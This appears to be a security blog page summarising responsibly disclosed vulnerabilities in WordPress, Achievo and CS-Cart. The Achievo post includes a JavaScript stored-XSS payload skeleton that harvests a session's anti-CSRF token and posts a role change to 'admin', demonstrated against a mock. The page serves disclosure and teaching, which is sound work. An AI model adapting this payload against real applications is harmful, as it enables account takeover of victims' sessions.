Recent
WordPress >= 2.9 Failure to Restrict URL Access
1. *Advisory Information*
Title: WordPress >= 2.9 Failure to Restrict URL Access
Date published: 13/02/2010
2. *Vulnerability Information*
Class: Failure to Restrict URL Access
Remotely Exploitable: Yes
Locally Exploitable: Yes
[BONSAI] XSS and SQL Injection in Achievo <= 1.3.4
Today Andres Riancho, owner of Bonsai Information Security (Argentina) and lead developer of w3af, released a couple of advisories on vulnerabilities in Achievo <= 1.3.4 which we found a few months ago during our vulnerability research into common web applications.
The affected web application is Achievo <= 1.3.4. Achievo suffered from multiple simple persistent (stored) XSS vulnerabilities within its scheduler module and an SQL injection vulnerability within its dispatch.php file.
Achievo is a flexible web-based resource management tool for business environments. Achievo's resource management capabilities will enable organisations to support their business processes in a simple, but effective manner.
Andres and I worked on a payload for the persistent XSS vulnerability we found that was quite novel (to me). Essentially, the payload was an AJAX script that sent POST requests to the vulnerable application from inside the victim's browser, riding their authenticated session, in order to escalate a user's privileges. A write-up by Andres on the payload can be found here: http://www.bonsai-sec.com/blog/index.php/cross-site-scripting-payloads/
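The following is an added illustration of that payload pattern, written for this page rather than taken from the original post or from the Bonsai write-up. The endpoint paths (/user/edit, /user/update), the field names (csrf_token, user_id, role) and the form HTML are hypothetical placeholders standing in for whatever the target application really uses, and the fetch function is injected so the whole flow can be run offline against a constructed mock. What it shows is the two-step shape of a self-escalating XSS payload: first GET the edit form with the victim's cookies to harvest the anti-CSRF token, then POST the form back with the role changed.

```javascript
// Added example: skeleton of a stored-XSS payload that rides the victim's
// authenticated session to change a user's role. Not code from the original
// post or from the Achievo advisory; all endpoints and field names are
// hypothetical placeholders.

// Pull the value of the hidden input named `tokenField` out of a form body.
// Anti-CSRF tokens do not stop this: the script runs in the victim's origin,
// so it can simply read the token out of the page before posting.
// (tokenField is a fixed constant here, so it is not regex-escaped.)
function extractToken(html, tokenField) {
  const re = new RegExp(
    "<input[^>]*name=['\"]" + tokenField + "['\"][^>]*value=['\"]([^'\"]*)['\"]",
    'i'
  );
  const m = re.exec(html);
  return m ? m[1] : null;
}

// Encode the fields as application/x-www-form-urlencoded, like a real submit.
function buildEscalationBody(fields) {
  return Object.entries(fields)
    .map(([k, v]) => encodeURIComponent(k) + '=' + encodeURIComponent(v))
    .join('&');
}

// The payload proper. `fetchImpl` is injected so it can be exercised offline;
// in a browser this would be window.fetch (or XMLHttpRequest back in 2010).
async function escalatePrivileges(fetchImpl, opts) {
  // Step 1: fetch the edit form with the victim's cookies and harvest the token.
  const formRes = await fetchImpl(opts.editUrl, { credentials: 'include' });
  const html = await formRes.text();
  const token = extractToken(html, opts.tokenField);
  if (token === null) {
    return { ok: false, reason: 'token not found' };
  }
  // Step 2: post the form back with the role field changed.
  const body = buildEscalationBody({
    [opts.tokenField]: token,
    user_id: opts.userId,
    role: opts.newRole,
  });
  const res = await fetchImpl(opts.updateUrl, {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body,
  });
  return { ok: res.status === 200, token, body };
}

// Constructed stand-in for the target's edit form (hypothetical markup).
const SAMPLE_FORM =
  '<form action="/user/update"><input type="hidden" name="csrf_token" value="a1b2c3">' +
  '<input name="role" value="user"></form>';

// Mock fetch that records every request so the exchange can be inspected.
function mockFetch(log) {
  return async (url, init = {}) => {
    log.push({ url, method: init.method || 'GET', body: init.body || null });
    if (init.method === 'POST') {
      return { status: 200, text: async () => 'updated' };
    }
    return { status: 200, text: async () => SAMPLE_FORM };
  };
}

const PAYLOAD_OPTS = {
  editUrl: '/user/edit',     // hypothetical
  updateUrl: '/user/update', // hypothetical
  tokenField: 'csrf_token',  // hypothetical
  userId: '42',
  newRole: 'admin',
};

// Run the payload against the mock and return both the result and the
// request log, so the GET-then-POST sequence can be checked.
async function demo() {
  const log = [];
  const result = await escalatePrivileges(mockFetch(log), PAYLOAD_OPTS);
  return { result, log };
}

demo().then(({ result, log }) => {
  console.log(result.ok, log.map((r) => r.method + ' ' + r.url).join(', '));
});
```

The point of the first request is what makes this different from plain CSRF: a token tied to the session is no obstacle once script is already executing in the victim's origin, so the fix for the stored XSS (output encoding in the scheduler module) is the real control, not the token.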
For the original advisories:
All vulnerabilities found were disclosed in an ethical manner. We worked alongside the affected application's developers in order to fix the vulnerabilities found. The advisories were not published until the developers had fixed and updated their software.
[BONSAI] SQL Injection in CS-Cart <= 2.0.5
Here is one of the vulnerabilities I found during my research for Bonsai Security a few weeks ago. The research consisted of vulnerability-assessing commercial and open source ecommerce web applications over a two-week period.
During my research I learnt a great deal from Andres Riancho (w3af/bonsai-sec owner) and from the vulnerability assessments themselves. So what did I learn? I learnt that patience is definitely a virtue, that JavaScript is a pain in the ass, that ecommerce web application developers need to invest more time in security, and a lot more about perfecting my assessment techniques.
Here is the vulnerability report:
http://www.bonsai-sec.com/research/vulnerabilities/cs-cart_SQL-injection-0100.txt
Here is a great post by Andres on the difficulty of actually exploiting it:
http://www.bonsai-sec.com/blog/index.php/not-the-average-sql-injection/
A massive thanks to Andres for giving me the opportunity to work for him. I learnt more in the (just over) two-week period working for him than I could have learnt in a whole 12 months.

